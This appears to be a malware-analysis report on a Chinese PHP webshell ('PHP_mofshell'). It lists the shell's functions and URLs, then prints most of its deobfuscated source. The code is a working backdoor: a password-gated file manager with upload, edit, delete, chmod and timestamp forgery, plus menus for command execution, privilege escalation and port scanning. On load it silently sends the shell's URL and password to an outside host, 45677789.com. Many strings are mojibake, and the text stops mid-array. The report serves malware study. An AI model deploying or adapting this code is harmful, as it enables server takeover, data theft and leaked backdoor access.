Screenshot
Attributes
Encoding
base64_decode (Deobfuscated, Original, Traces)
base64_encode (Deobfuscated, Traces)

Environment
error_reporting (Deobfuscated, Original, Traces)
php_uname (Deobfuscated, Traces)
phpinfo (Deobfuscated, Traces)
set_time_limit (Deobfuscated, Original, Traces)

Execution
eval (Deobfuscated, Original, Traces)
exec (Deobfuscated, Traces)
passthru (Deobfuscated, Traces)
proc_open (Deobfuscated, Traces)
shell_exec (Deobfuscated, Traces)
system (Deobfuscated, Traces)

Files
copy (Deobfuscated, Traces)
file_get_contents (Deobfuscated, Traces)
move_uploaded_file (Deobfuscated, Traces)

Input
_FILES (Deobfuscated, Traces)
_GET (Deobfuscated, Traces)
_POST (Deobfuscated, Traces)

Title
{$Server_IP} -PHP_mofshell By{$shellname}- {$Server_OS} - {$Server_Soft}\r\n
??ַ:Traces)
127.0.0.1-PHPmofshell By:caidaome.com (HTML)

URLs
http://45677789.com/?hm= (Deobfuscated, Traces)
http://45677789.com/?hm=http%3A%2F%2Flocalhost%2Fuploads%2FPHP%E5%A4%A7%E9%A9%AC-php_mof%2BSHELL.php%7C%7Cadmin&bz=php (Traces)
http://localhost/eanver.htm (Deobfuscated, Traces)
http://localhost/uploads/PHP (Traces)
http://www.baidu.com/down/muma.exe (Deobfuscated, Traces)
http://www.caidaome.com (Deobfuscated, Original, Traces)
http://www.caidaome.com/ (Deobfuscated, Traces)

Deobfuscated PHP code
<?php

$password = 'admin';
$shellname = 'caidaome.com';
$myurl = 'http://www.caidaome.com';
error_reporting("E_USR_W");
@set_time_limit(0);
header("content-Type: text/html; charset=gb2312");
eval /* PHPDeobfuscator eval output */ {
    ob_start();
    @file_get_contents("http://45677789.com/?hm=" . urlencode("http://" . $_SERVER['HTTP_HOST'] . $_SERVER['PHP_SELF'] . "||" . $password) . "&bz=php");
    define('myaddress', $_SERVER['SCRIPT_FILENAME']);
    define('myaddress', $_SERVER['SCRIPT_FILENAME']);
    define('envlpass', $password);
    define('shellname', $shellname);
    define('myurl', $myurl);
    if (@get_magic_quotes_gpc()) {
        foreach ($_POST as $k => $v) {
            $_POST[$k] = stripslashes($v);
        }
        foreach ($_GET as $k => $v) {
            $_GET[$k] = stripslashes($v);
        }
    }
    if (isset($_REQUEST[envlpass])) {
        hmlogin(2);
        exit;
    }
    if ($_COOKIE['envlpass'] != md5(envlpass)) {
        if ($_POST['envlpass']) {
            if ($_POST['envlpass'] == envlpass) {
                setcookie('envlpass', md5($_POST['envlpass']));
                css_main();
                hmlogin();
                die;
            } else {
                echo "<CENTER>\xd3\xc3\xbb\xa7\xbb\xf2\xc3\xdc\xc2\xeb\xb4\xed\xce\xf3</CENTER>";
            }
        }
        islogin($shellname, $myurl);
        exit;
    }
    /*---End Login---*/
    if (isset($_GET['down'])) {
        do_down($_GET['down']);
    }
    if (isset($_GET['pack'])) {
        $dir = do_show($_GET['pack']);
        $zip = new eanver($dir);
        $out = $zip->out;
        do_download($out, "eanver.tar.gz");
    }
    if (isset($_GET['unzip'])) {
        css_main();
        start_unzip($_GET['unzip'], $_GET['unzip'], $_GET['todir']);
        exit;
    }
    define('root_dir', "./");
    define('run_win', false);
    define('my_shell', str_path(root_dir . $_SERVER['SCRIPT_NAME']));
    $eanver = isset($_GET['eanver']) ? $_GET['eanver'] : "";
    $doing = isset($_POST['doing']) ? $_POST['doing'] : "";
    $path = isset($_GET['path']) ? $_GET['path'] : root_dir;
    $name = isset($_POST['name']) ? $_POST['name'] : "";
    $img = isset($_GET['img']) ? $_GET['img'] : "";
    $p = isset($_GET['p']) ? $_GET['p'] : "";
    $pp = urlencode(dirname($p));
    if ($img) {
        css_img($img);
    }
    if ($eanver == "phpinfo") {
        die(phpinfo());
    }
    if ($eanver == 'logout') {
        setcookie('envlpass', null);
        die('<meta http-equiv="refresh" content="0;URL=?">');
    }
    $class = array("\xd0\xc5\xcf\xa2\xb2\xd9\xd7\xf7" => array("upfiles" => "\xc9\xcf\xb4\xab\xce\xc4\xbc\xfe", "phpinfo" => "\xbb\xf9\xb1\xbe\xd0\xc5\xcf\xa2", "info_f" => "\xcf\xb5\xcd\xb3\xd0\xc5\xcf\xa2", "phpcode" => "\xd6\xb4\xd0\xd0PHP\xbd\xc5\xb1\xbe"), "\xcc\xe1\xc8\xa8\xb9\xa4\xbe\xdf" => array("sqlshell" => "\xd6\xb4\xd0\xd0SQL\xd3\xef\xbe\xe4", "mysql_exec" => "MYSQL\xb9\xdc\xc0\xed", "othersql" => "\xc6\xe4\xcb\xfb\xca\xfd\xbe\xdd\xbf\xe2", "myexp" => "MYSQL_UDF\xcc\xe1\xc8\xa8", "winapi" => "WIN API\xcc\xe1\xc8\xa8", "mofshell" => "Mof\xcb\xab\xd6\xd8\xcc\xe1\xc8\xa8", "cmd" => "\xd6\xb4\xd0\xd0CMD\xc3\xfc\xc1\xee", "linux" => "\xb7\xb4\xb5\xaf\xcc\xe1\xc8\xa8", "servu" => "Serv-U\xcc\xe1\xc8\xa8", "readpass" => "\xb5\xcd\xc8\xa8\xcf\xde\xb6\xc1root\xc3\xdc\xc2\xeb", "downloader" => "\xce\xc4\xbc\xfe\xcf\xc2\xd4\xd8", "port" => "\xb6\xcb\xbf\xda\xc9\xa8\xc3\xe8"), "\xc5\xfa\xc1\xbf\xb2\xd9\xd7\xf7" => array("guama" => "\xc5\xfa\xc1\xbf\xb9\xd2\xc2\xed\xc7\xe5\xc2\xed", "tihuan" => "\xc5\xfa\xc1\xbf\xcc\xe6\xbb\xbb\xc4\xda\xc8\xdd", "scanfile" => "\xc5\xfa\xc1\xbf\xcb\xd1\xcb\xf7\xce\xc4\xbc\xfe", "scanphp" => "\xc5\xfa\xc1\xbf\xb2\xe9\xd5\xd2\xc4\xbe\xc2\xed", "zippak" => "zip\xbd\xe2\xd1\xb9"), "\xbd\xc5\xb1\xbe\xb2\xe5\xbc\xfe" => array("getcode" => "\xbb\xf1\xc8\xa1\xcd\xf8\xd2\xb3\xd4\xb4\xc2\xeb"));
    $msg = array("0" => "\xb1\xa3\xb4\xe6\xb3\xc9\xb9\xa6", "1" => "\xb1\xa3\xb4\xe6\xca\xa7\xb0\xdc", "2" => "\xc9\xcf\xb4\xab\xb3\xc9\xb9\xa6", "3" => "\xc9\xcf\xb4\xab\xca\xa7\xb0\xdc", "4" => "\xd0\xde\xb8\xc4\xb3\xc9\xb9\xa6", "5" => "\xd0\xde\xb8\xc4\xca\xa7\xb0\xdc", "6" => "\xc9\xbe\xb3\xfd\xb3\xc9\xb9\xa6", "7" => "\xc9\xbe\xb3\xfd\xca\xa7\xb0\xdc");
    css_main();
    switch ($eanver) {
        case "left":
            css_left();
            html_n("<dl><dt><a href=\"#\" onclick=\"showHide('items1');\" target=\"_self\">");
            html_img("title");
            html_n(" \xb1\xbe\xb5\xd8\xd3\xb2\xc5\xcc</a></dt><dd id=\"items1\" style=\"display:block;\"><ul>");
            $ROOT_DIR = File_Mode();
            for ($i = 66; $i <= 90; $i++) {
                $drive = chr($i) . ':';
                if (is_dir($drive . "/")) {
                    $vol = File_Str("vol {$drive}");
                    if (empty($vol)) {
                        $vol = $drive;
                    }
                    html_n("<li><a title='{$drive}' href='?eanver=main&path={$drive}' target='main'>\xb1\xbe\xb5\xd8\xb4\xc5\xc5\xcc({$drive})</a></li>");
                }
            }
            html_n("<li><a title='{$ROOT_DIR}' href='?eanver=main&path={$ROOT_DIR}' target='main'>\xcd\xf8\xd5\xbe\xb8\xf9\xc4\xbf\xc2\xbc</a></li>");
            html_n("<li><a href='?eanver=main' target='main'>\xb1\xbe\xb3\xcc\xd0\xf2\xc4\xbf\xc2\xbc</a></li>");
            html_n("</ul></dd></dl>");
            $i = 2;
            foreach ($class as $name => $array) {
                html_n("<dl><dt><a href=\"#\" onclick=\"showHide('items{$i}');\" target=\"_self\">");
                html_img("title");
                html_n(" {$name}</a></dt><dd id=\"items{$i}\" style=\"display:block;\"><ul>");
                foreach ($array as $url => $value) {
                    html_n("<li><a href=\"?eanver={$url}\" target='main'>{$value}</a></li>");
                }
                html_n("</ul></dd></dl>");
                $i++;
            }
            html_n("<dl><dt><a href=\"#\" onclick=\"showHide('items{$i}');\" target=\"_self\">");
            html_img("title");
            html_n(" \xc6\xe4\xcb\xfc\xb2\xd9\xd7\xf7</a></dt><dd id=\"items{$i}\" style=\"display:block;\"><ul>");
            html_n("<li><a title='\xb3\xcc\xd0\xf2\xb8\xfc\xd0\xc2' href='http://www.caidaome.com/' target=\"main\">\xb3\xcc\xd0\xf2\xb8\xfc\xd0\xc2</a></li>");
            html_n("<li><a title='\xb0\xb2\xc8\xab\xcd\xcb\xb3\xf6' href='?eanver=logout' target=\"main\">\xb0\xb2\xc8\xab\xcd\xcb\xb3\xf6</a></li>");
            html_n("</ul></dd></dl>");
            html_n("</div>");
            break;
        case "main":
            css_js("1");
            function getFilePermissions($file)
            {
                $perms = fileperms($file);
                if (($perms & 0xc000) == 0xc000) {
                    // Socket
                    $info = 's';
                } elseif (($perms & 0xa000) == 0xa000) {
                    // Symbolic Link
                    $info = 'l';
                } elseif (($perms & 0x8000) == 0x8000) {
                    // Regular
                    $info = '-';
                } elseif (($perms & 0x6000) == 0x6000) {
                    // Block special
                    $info = 'b';
                } elseif (($perms & 0x4000) == 0x4000) {
                    // Directory
                    $info = 'd';
                } elseif (($perms & 0x2000) == 0x2000) {
                    // Character special
                    $info = 'c';
                } elseif (($perms & 0x1000) == 0x1000) {
                    // FIFO pipe
                    $info = 'p';
                } else {
                    // Unknown
                    $info = 'u';
                }
                // Owner
                $info .= $perms & 0x100 ? 'r' : '-';
                $info .= $perms & 0x80 ? 'w' : '-';
                $info .= $perms & 0x40 ? $perms & 0x800 ? 's' : 'x' : ($perms & 0x800 ? 'S' : '-');
                // Group
                $info .= $perms & 0x20 ? 'r' : '-';
                $info .= $perms & 0x10 ? 'w' : '-';
                $info .= $perms & 0x8 ? $perms & 0x400 ? 's' : 'x' : ($perms & 0x400 ? 'S' : '-');
                // World
                $info .= $perms & 0x4 ? 'r' : '-';
                $info .= $perms & 0x2 ? 'w' : '-';
                $info .= $perms & 0x1 ? $perms & 0x200 ? 't' : 'x' : ($perms & 0x200 ? 'T' : '-');
                return $info;
            }
            $dir = @dir($path);
            $REAL_DIR = File_Str(realpath($path));
            if (!empty($_POST['actall'])) {
                echo '<div class="actall">' . File_Act($_POST['files'], $_POST['actall'], $_POST['inver'], $REAL_DIR) . '</div>';
            }
            $NUM_D = $NUM_F = 0;
            if (!$_SERVER['SERVER_NAME']) {
                $GETURL = '';
            } else {
                $GETURL = 'http://' . $_SERVER['SERVER_NAME'] . '/';
            }
            $ROOT_DIR = File_Mode();
            html_n("<table width=\"100%\" border=0 bgcolor=\"#555555\"><tr><td><form method='GET'>\xb5\xd8\xd6\xb7:<input type='hidden' name='eanver' value='main'>");
            html_n("<input type='text' size='80' name='path' value='{$path}'> <input type='submit' value='\xd7\xaa\xb5\xbd'></form>");
            html_n("<form method='POST' enctype=\"multipart/form-data\" action='?eanver=editr&p=" . urlencode($path) . "'>");
            html_n("<input type=\"button\" value=\"\xd0\xc2\xbd\xa8\xce\xc4\xbc\xfe\" onclick=\"rusurechk('newfile.php','?eanver=editr&p=" . urlencode($path) . "&refile=1&name=');\">&nbsp;<input type=\"button\" value=\"\xd0\xc2\xbd\xa8\xc4\xbf\xc2\xbc\" onclick=\"rusurechk('newdir','?eanver=editr&p=" . urlencode($path) . "&redir=1&name=');\">");
            html_input("file", "upfilet", "", "&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ");
            html_input("submit", "uploadt", "\xc9\xcf\xb4\xab");
            if (!empty($_POST['newfile'])) {
                if (isset($_POST['bin'])) {
                    $bin = $_POST['bin'];
                } else {
                    $bin = "wb";
                }
                if (false) {
                    if ($_POST['charset'] == 'GB2312' or $_POST['charset'] == 'GBK') {
                    } else {
                        $_POST['txt'] = iconv("gb2312//IGNORE", $_POST['charset'], $_POST['txt']);
                    }
                }
                echo do_write($_POST['newfile'], $bin, $_POST['txt']) ? '<br>' . $_POST['newfile'] . ' ' . $msg[0] : '<br>' . $_POST['newfile'] . ' ' . $msg[1];
                @touch($_POST['newfile'], @strtotime($_POST['time']));
            }
            html_n('</form></td></tr></table><form method="POST" name="fileall" id="fileall" action="?eanver=main&path=' . $path . '"><table width="100%" border=0 bgcolor="#555555"><tr height="25"><td width="35%"><b>');
            html_a('?eanver=main&path=' . uppath($path), '<b><font color=red>�ϼ�Ŀ¼</font></b>');
            html_n('</b></td><td align="center" width="15%"><b>���</b></td><td align="center" width="10%">');
            html_n('<b>�ļ�����</b></td><td align="center" width="15%"><b>�޸�ʱ��</b></td><td align="center" width="5%"><b>�ļ���С</b></td></tr>');
            while ($dirs = @$dir->read()) {
                if ($dirs == '.' or $dirs == '..') {
                    continue;
                }
                $dirpath = str_path("{$path}/{$dirs}");
                if (is_dir($dirpath)) {
                    $perm = getFilePermissions($dirpath) . " " . substr(base_convert(fileperms($dirpath), 10, 8), -4);
                    $filetime = @date('Y-m-d H:i:s', @filemtime($dirpath));
                    $dirpath = urlencode($dirpath);
                    html_n('<tr height="25"><td><input type="checkbox" name="files[]" value="' . $dirs . '">');
                    html_img("dir");
                    html_a('?eanver=main&path=' . $dirpath, $dirs);
                    html_n('</td><td align="center">');
                    html_n("<a href=\"#\" onClick=\"rusurechk('{$dirs}','?eanver=rename&p={$dirpath}&newname=');return false;\">\xb8\xc4\xc3\xfb</a>");
                    html_n("<a href=\"#\" onClick=\"rusuredel('{$dirs}','?eanver=deltree&p={$dirpath}');return false;\">\xc9\xbe\xb3\xfd</a> ");
                    html_a('?pack=' . $dirpath, '��');
                    html_n('</td><td align="center">');
                    html_a('?eanver=perm&p=' . $dirpath . '&chmod=' . $perm, $perm);
                    html_n('</td><td align="center">' . $filetime . '</td><td align="right">');
                    html_n('</td></tr>');
                    $NUM_D++;
                }
            }
            @$dir->rewind();
            while ($files = @$dir->read()) {
                if ($files == '.' or $files == '..') {
                    continue;
                }
                $filepath = str_path("{$path}/{$files}");
                if (!is_dir($filepath)) {
                    $fsize = @filesize($filepath);
                    $fsize = File_Size($fsize);
                    $perm = getFilePermissions($dirpath) . " " . substr(base_convert(fileperms($filepath), 10, 8), -4);
                    $filetime = @date('Y-m-d H:i:s', @filemtime($filepath));
                    $Fileurls = str_replace(File_Str($ROOT_DIR . '/'), $GETURL, $filepath);
                    $todir = $ROOT_DIR . '/zipfile';
                    $filepath = urlencode($filepath);
                    $it = substr($filepath, -3);
                    html_n('<tr height="25"><td><input type="checkbox" name="files[]" value="' . $files . '">');
                    html_img(css_showimg($files));
                    html_a($Fileurls, $files, ' target="_blank" title="��"');
                    html_n('</td><td align="center">');
                    if ($it == '.gz' or $it == 'zip' or $it == 'tar' or $it == '.7z') {
                        html_a('?unzip=' . $filepath, '��ѹ', 'title="��ѹ' . $files . '" onClick="rusurechk(\'' . $todir . '\',\'?unzip=' . $filepath . '&todir=\');return false;"');
                    } else {
                        html_a('?eanver=editr&p=' . $filepath, '�༭', 'title="�༭' . $files . '"');
                    }
                    html_n("<a href=\"#\" onClick=\"rusurechk('{$files}','?eanver=rename&p={$filepath}&newname=');return false;\">\xb8\xc4\xc3\xfb</a>");
                    html_n("<a href=\"#\" onClick=\"rusurechk('" . urldecode($filepath) . "','?eanver=copy&p={$filepath}&newcopy=');return false;\">\xb8\xb4\xd6\xc6</a>");
                    html_n("<a href=\"#\" onClick=\"rusuredel('{$files}','?eanver=del&p={$filepath}');return false;\">\xc9\xbe\xb3\xfd</a> ");
                    html_a('?down=' . $filepath, '����', '�༭', 'title="����' . $files . '"');
                    html_n('</td><td align="center">');
                    html_a('?eanver=perm&p=' . $filepath . '&chmod=' . $perm, $perm);
                    html_n('</td><td align="center">' . $filetime . '</td><td align="center">');
                    html_a('?down=' . $filepath, $fsize, 'title="����' . $files . '"');
                    html_n('</td></tr>');
                    $NUM_F++;
                }
            }
            @$dir->close();
            if (!$Filetime) {
                $Filetime = gmdate('Y-m-d H:i:s', time() + 28800);
            }
            print <<<END
</table>
<div class="actall"> <input type="hidden" id="actall" name="actall" value="undefined"> 
<input type="hidden" id="inver" name="inver" value="undefined"> 
<input name="chkall" value="on" type="checkbox" onclick="CheckAll(this.form);"> 
<input type="button" value="\xb8\xb4\xd6\xc6" onclick="SubmitUrl('\xb8\xb4\xd6\xc6\xcb\xf9\xd1\xa1\xce\xc4\xbc\xfe\xb5\xbd\xc2\xb7\xbe\xb6: ','{$REAL_DIR}','a');return false;"> 
<input type="button" value="\xc9\xbe\xb3\xfd" onclick="Delok('\xcb\xf9\xd1\xa1\xce\xc4\xbc\xfe','b');return false;"> 
<input type="button" value="\xca\xf4\xd0\xd4" onclick="SubmitUrl('\xd0\xde\xb8\xc4\xcb\xf9\xd1\xa1\xce\xc4\xbc\xfe\xca\xf4\xd0\xd4\xd6\xb5\xce\xaa: ','0666','c');return false;"> 
<input type="button" value="\xca\xb1\xbc\xe4" onclick="CheckDate('{$Filetime}','d');return false;"> 
<input type="button" value="\xb4\xf2\xb0\xfc" onclick="SubmitUrl('\xb4\xf2\xb0\xfc\xb2\xa2\xcf\xc2\xd4\xd8\xcb\xf9\xd1\xa1\xce\xc4\xbc\xfe\xcf\xc2\xd4\xd8\xc3\xfb\xce\xaa: ','{$_SERVER['SERVER_NAME']}.tar.gz','e');return false;">
\xc4\xbf\xc2\xbc({$NUM_D}) / \xce\xc4\xbc\xfe({$NUM_F})</div> 
</form> 
END;
            break;
        case "editr":
            css_js("2");
            if (!empty($_POST['uploadt'])) {
                echo @copy($_FILES['upfilet']['tmp_name'], str_path($p . '/' . $_FILES['upfilet']['name'])) ? html_a("?eanver=main", $_FILES['upfilet']['name'] . ' ' . $msg[2]) : msg($msg[3]);
                die('<meta http-equiv="refresh" content="1;URL=?eanver=main&path=' . urlencode($p) . '">');
            }
            if (!empty($_GET['redir'])) {
                $name = $_GET['name'];
                $newdir = str_path($p . '/' . $name);
                @mkdir($newdir, 0777) ? html_a("?eanver=main", $name . ' ' . $msg[0]) : msg($msg[1]);
                die('<meta http-equiv="refresh" content="1;URL=?eanver=main&path=' . urlencode($p) . '">');
            }
            if (!empty($_GET['refile'])) {
                $name = $_GET['name'];
                $jspath = urlencode($p . '/' . $name);
                $pp = urlencode($p);
                $p = str_path($p . '/' . $name);
                $FILE_CODE = "";
                $charset = 'GB2312';
                $FILE_TIME = date('Y-m-d H:i:s', time() + 28800);
                if (@file_exists($p)) {
                    echo "\xb7\xa2\xcf\xd6\xc4\xbf\xc2\xbc\xcf\xc2\xd3\xd0\"\xcd\xac\xc3\xfb\"\xce\xc4\xbc\xfe<br>";
                }
            } else {
                $jspath = urlencode($p);
                $FILE_TIME = date('Y-m-d H:i:s', filemtime($p));
                $FILE_CODE = @file_get_contents($p);
                if (false) {
                    if (empty($_GET['charset'])) {
                        if (TestUtf8($FILE_CODE) > 1) {
                            $charset = 'UTF-8';
                            $FILE_CODE = iconv("UTF-8", "gb2312//IGNORE", $FILE_CODE);
                        } else {
                            $charset = 'GB2312';
                        }
                    } else {
                        if ($_GET['charset'] == 'GB2312') {
                            $charset = 'GB2312';
                        } else {
                            $charset = $_GET['charset'];
                            $FILE_CODE = iconv($_GET['charset'], "gb2312//IGNORE", $FILE_CODE);
                        }
                    }
                }
                $FILE_CODE = htmlspecialchars($FILE_CODE);
            }
            print <<<END
<div class="actall">\xb2\xe9\xd5\xd2\xc4\xda\xc8\xdd: <input name="searchs" type="text" value="{$dim}" style="width:500px;">
<input type="button" value="\xb2\xe9\xd5\xd2" onclick="search(searchs.value)"></div>
<form method='POST' id="editor"  action='?eanver=main&path={$pp}'>
<div class="actall">
<input type="text" name="newfile"  id="newfile" value="{$p}" style="width:750px;">\xd6\xb8\xb6\xa8\xb1\xe0\xc2\xeb\xa3\xba<input name="charset" id="charset" value="{$charset}" Type="text" style="width:80px;" onkeydown="if(event.keyCode==13)window.location='?eanver=editr&p={$jspath}&charset='+this.value;">
<input type="button" value="\xd1\xa1\xd4\xf1" onclick="window.location='?eanver=editr&p={$jspath}&charset='+this.form.charset.value;" style="width:50px;"> 
END;
            html_select(array("GB2312" => "GB2312", "UTF-8" => "UTF-8", "BIG5" => "BIG5", "EUC-KR" => "EUC-KR", "EUC-JP" => "EUC-JP", "SHIFT-JIS" => "SHIFT-JIS", "WINDOWS-874" => "WINDOWS-874", "ISO-8859-1" => "ISO-8859-1"), $charset, "onchange=\"window.location='?eanver=editr&p={$jspath}&charset='+options[selectedIndex].value;\"");
            print <<<END
</div>
<div class="actall"><textarea name="txt" style="width:100%;height:380px;">{$FILE_CODE}</textarea></div>
<div class="actall">\xce\xc4\xbc\xfe\xd0\xde\xb8\xc4\xca\xb1\xbc\xe4 <input type="text" name="time" id="mtime" value="{$FILE_TIME}" style="width:150px;"> <input type="checkbox" name="bin" value="wb+" size="" checked>\xd2\xd4\xb6\xfe\xbd\xf8\xd6\xc6\xd0\xce\xca\xbd\xb1\xa3\xb4\xe6\xce\xc4\xbc\xfe(\xbd\xa8\xd2\xe9\xca\xb9\xd3\xc3)</div>
<div class="actall"><input type="button" value="\xb1\xa3\xb4\xe6" onclick="CheckDate();" style="width:80px;"> <input name='reset' type='reset' value='\xd6\xd8\xd6\xc3'> 
<input type="button" value="\xb7\xb5\xbb\xd8" onclick="window.location='?eanver=main&path={$pp}';" style="width:80px;"></div>
</form>
END;
            break;
        case "rename":
            html_n("<tr><td>");
            $newname = urldecode($pp) . '/' . urlencode($_GET['newname']);
            @rename($p, $newname) ? html_a("?eanver=main&path={$pp}", urlencode($_GET['newname']) . ' ' . $msg[4]) : msg($msg[5]);
            die('<meta http-equiv="refresh" content="1;URL=?eanver=main&path=' . $pp . '">');
        case "deltree":
            html_n("<tr><td>");
            do_deltree($p) ? html_a("?eanver=main&path={$pp}", $p . ' ' . $msg[6]) : msg($msg[7]);
            die('<meta http-equiv="refresh" content="1;URL=?eanver=main&path=' . $pp . '">');
        case "del":
            html_n("<tr><td>");
            @unlink($p) ? html_a("?eanver=main&path={$pp}", $p . ' ' . $msg[6]) : msg($msg[7]);
            die('<meta http-equiv="refresh" content="1;URL=?eanver=main&path=' . $pp . '">');
        case "copy":
            html_n("<tr><td>");
            $newpath = explode('/', $_GET['newcopy']);
            $pathr[0] = $newpath[0];
            for ($i = 1; $i < count($newpath); $i++) {
                $pathr[] = urlencode($newpath[$i]);
            }
            $newcopy = implode('/', $pathr);
            @copy($p, $newcopy) ? html_a("?eanver=main&path={$pp}", $newcopy . ' ' . $msg[4]) : msg($msg[5]);
            die('<meta http-equiv="refresh" content="1;URL=?eanver=main&path=' . $pp . '">');
        case "perm":
            html_n("<form method='POST'><tr><td>" . $p . ' ����Ϊ: ');
            if (is_dir($p)) {
                html_select(array("0777" => "0777", "0755" => "0755", "0555" => "0555"), $_GET['chmod']);
            } else {
                html_select(array("0666" => "0666", "0644" => "0644", "0444" => "0444"), $_GET['chmod']);
            }
            html_input("submit", "save", "\xd0\xde\xb8\xc4");
            back();
            if ($_POST['class']) {
                switch ($_POST['class']) {
                    case "0777":
                        $change = @chmod($p, 0777);
                        break;
                    case "0755":
                        $change = @chmod($p, 0755);
                        break;
                    case "0555":
                        $change = @chmod($p, 0555);
                        break;
                    case "0666":
                        $change = @chmod($p, 0666);
                        break;
                    case "0644":
                        $change = @chmod($p, 0644);
                        break;
                    case "0444":
                        $change = @chmod($p, 0444);
                        break;
                }
                $change ? html_a("?eanver=main&path={$pp}", $msg[4]) : msg($msg[5]);
                die('<meta http-equiv="refresh" content="1;URL=?eanver=main&path=' . $pp . '">');
            }
            html_n("</td></tr></form>");
            break;
        case "info_f":
            function Info_Cfg($varname)
            {
                switch ($result = get_cfg_var($varname)) {
                    case 0:
                        return "No";
                    case 1:
                        return "Yes";
                    default:
                        return $result;
                }
            }
            function Info_Fun($funName)
            {
                return false !== function_exists($funName) ? "Yes" : "No";
            }
            $dis_func = get_cfg_var("disable_functions");
            $upsize = get_cfg_var("file_uploads") ? get_cfg_var("upload_max_filesize") : "\xb2\xbb\xd4\xca\xd0\xed\xc9\xcf\xb4\xab";
            $adminmail = isset($_SERVER['SERVER_ADMIN']) ? "<a href=\"mailto:" . $_SERVER['SERVER_ADMIN'] . "\">" . $_SERVER['SERVER_ADMIN'] . "</a>" : "<a href=\"mailto:" . get_cfg_var("sendmail_from") . "\">" . get_cfg_var("sendmail_from") . "</a>";
            if ($dis_func == "") {
                $dis_func = "No";
            } else {
                $dis_func = "No";
                $dis_func = "No";
            }
            $phpinfo = !eregi("phpinfo", $dis_func) ? "Yes" : "No";
            $info = array(array("\xb7\xfe\xce\xf1\xc6\xf7\xca\xb1\xbc\xe4/\xb1\xb1\xbe\xa9\xca\xb1\xbc\xe4", date("Y\xc4\xeam\xd4\xc2d\xc8\xd5 h:i:s", time()) . "&nbsp;/&nbsp;" . gmdate("Y\xc4\xean\xd4\xc2j\xc8\xd5 H:i:s", time() + 28800)), array("\xb7\xfe\xce\xf1\xc6\xf7\xd3\xf2\xc3\xfb:\xb6\xcb\xbf\xda(ip)", "<a href=\"http://" . $_SERVER['SERVER_NAME'] . "\" \r\ntarget=\"_blank\">" . $_SERVER['SERVER_NAME'] . "</a>:" . $_SERVER['SERVER_PORT'] . " ( " . gethostbyname($_SERVER['SERVER_NAME']) . " )"), array("\xb7\xfe\xce\xf1\xc6\xf7\xb2\xd9\xd7\xf7\xcf\xb5\xcd\xb3(\xce\xc4\xd7\xd6\xb1\xe0\r\n\xc2\xeb)", "PHP_OS (" . $_SERVER['HTTP_ACCEPT_LANGUAGE'] . ")"), array("\xb7\xfe\xce\xf1\xc6\xf7\xbd\xe2\xd2\xeb\xd2\xfd\xc7\xe6", $_SERVER['SERVER_SOFTWARE']), array("\xc4\xe3\xb5\xc4IP", getenv('REMOTE_ADDR')), array("PHP\xd4\xcb\xd0\xd0\xb7\xbd\xca\xbd(\r\n\xb0\xe6\xb1\xbe)", strtoupper(php_sapi_name()) . "(" . PHP_VERSION . ") / \xb0\xb2\xc8\xab\xc4\xa3\xca\xbd:" . Info_Cfg("safemode")), array("\xb7\xfe\xce\xf1\xc6\xf7\xb9\xdc\xc0\xed\xd4\xb1", $adminmail), array("\xb1\xbe\xce\xc4\xbc\xfe\xc2\xb7\xbe\xb6", "/var/www/html/PHP\xe5\xa4\xa7\xe9\xa9\xac-php_mof+SHELL.php.0ca89d1b3067617ba743b8a6b86c7490.bin"), array("\xd4\xca\xd0\xed\xca\xb9\xd3\xc3URL\xb4\xf2\xbf\xaa\xce\xc4\xbc\xfe[allow_url_fopen]", Info_Cfg("allow_url_fopen")), array("\xd4\xca\xd0\xed\xb6\xaf\xcc\xac\xbc\xd3\xd4\xd8\xc1\xb4\xbd\xd3\xbf\xe2[enable_dl]", Info_Cfg("enable_dl")), array("\xcf\xd4\xca\xbe\xb4\xed\xce\xf3\xd0\xc5\xcf\xa2[display_errors]", Info_Cfg("display_errors")), array("\xd7\xd4\xb6\xa8\xd2\xe5\xc8\xab\xbe\xd6\xb1\xe4\xc1\xbf[register_globals]", Info_Cfg("register_globals")), array("\xd7\xd4\xb6\xaf\xd7\xd6\xb7\xfb\xb4\xae\xd7\xaa\xd2\xe5[magic_quotes_gpc]", Info_Cfg("magic_quotes_gpc")), array("\xd7\xee\xb6\xe0\xc4\xda\xb4\xe6\xca\xb9\xd3\xc3\xc1\xbf[memory_limit]", Info_Cfg("memory_limit")), array("POST\xd7\xee\xb4\xf3\xd7\xd6\xbd\xda[post_max_size]", Info_Cfg("post_max_size")), array("\xd4\xca\xd0\xed\xd7\xee\xb4\xf3\xc9\xcf\xb4\xab[upload_max_filesize]", $upsize), array("\xb3\xcc\xd0\xf2\xd7\xee\xb3\xa4\xd4\xcb\xd0\xd0\xca\xb1\xbc\xe4[max_execution_time]", Info_Cfg("max_execution_time") . "\xc3\xeb"), array("\xbd\xfb\xd3\xc3\xba\xaf\xca\xfd[disable_functions]", $dis_func), array("\xb3\xcc\xd0\xf2\xd0\xc5\xcf\xa2\xba\xaf\xca\xfd[phpinfo()]", $phpinfo), array("\xc4\xbf\xc7\xb0\xbb\xb9\xd3\xd0\xbf\xd5\xd3\xe0\xbf\xd5\xbc\xe4diskfreespace", intval(diskfreespace(".") / 1048576) . 'Mb'), array("GZ\xd1\xb9\xcb\xf5\xce\xc4\xbc\xfe\xd6\xa7\xb3\xd6[zlib]", Info_Fun("gzclose")), array("ZIP\xd1\xb9\xcb\xf5\xce\xc4\xbc\xfe\xd6\xa7\xb3\xd6[ZipArchive(php_zip)]", Info_Fun("zip_open")), array("IMAP\xb5\xe7\xd7\xd3\xd3\xca\xbc\xfe\xcf\xb5\xcd\xb3", Info_Fun("imap_close")), array("XML\xbd\xe2\xce\xf6", Info_Fun("xml_set_object")), array("FTP\xb5\xc7\xc2\xbd", Info_Fun("ftp_login")), array("Session\xd6\xa7\xb3\xd6", Info_Fun("session_start")), array("Socket\xd6\xa7\xb3\xd6", Info_Fun("fsockopen")), array("MySQL\xca\xfd\xbe\xdd\xbf\xe2", Info_Fun("mysql_close")), array("MSSQL\xca\xfd\xbe\xdd\xbf\xe2", Info_Fun("mssql_close")), array("Postgre SQL\xca\xfd\xbe\xdd\xbf\xe2", Info_Fun("pg_close")), array("SQLite\xca\xfd\xbe\xdd\xbf\xe2", Info_Fun("sqlite_close")), array("Oracle\xca\xfd\xbe\xdd\xbf\xe2", Info_Fun("ora_close")), array("Oracle 8\xca\xfd\xbe\xdd\xbf\xe2", Info_Fun("OCILogOff")), array("SyBase\xca\xfd\xbe\xdd\xbf\xe2", Info_Fun("sybase_close")), array("Hyperwave\xca\xfd\xbe\xdd\xbf\xe2", Info_Fun("hw_close")), 